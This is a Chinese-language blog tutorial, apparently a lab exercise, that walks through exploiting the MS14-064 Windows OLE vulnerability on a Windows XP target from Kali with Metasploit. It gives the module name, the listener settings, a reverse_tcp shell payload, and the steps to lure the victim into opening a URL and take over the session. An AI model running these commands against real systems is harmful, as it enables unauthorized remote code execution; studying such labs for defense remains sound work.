针对ms14-064模块漏洞的网络渗透实战

一、环境说明

渗透机:kali

靶机:Windows xp

二、实战步骤

1、进入msfconsole渗透测试平台

命令:msfconsole

2、搜索ms14-064模块

命令:search ms14-064

3、使用exploit/windows/browser/ms14_064_ole_code_execution

命令:use exploit/windows/browser/ms14_064_ole_code_execution

4、查看需要配置的参数

命令:show options

5、配置参数

命令:

set SRVHOST 192.168.X.XX (设置本地监听地址)

set SRVPORT 8080 (设置本地监听端口)

set URIPATH / (设置网站路径)

set PAYLOAD windows/shell/reverse_tcp (设置攻击模块)

set LHOST 192.168.X.XX (设置攻击机地址)

6、再次查看配置好之后的参数

命令:show options

7、输入攻击命令,进行漏洞模块攻击

命令:run(或者exploit)

8、拿到步骤7中生成的url,在靶机中打开

9、在渗透机查看活跃会话

命令:sessions -i

10、进行渗透

命令:sessions -i 1

11、渗透成功,输入ipconfig查看效果

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

古道青阳

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值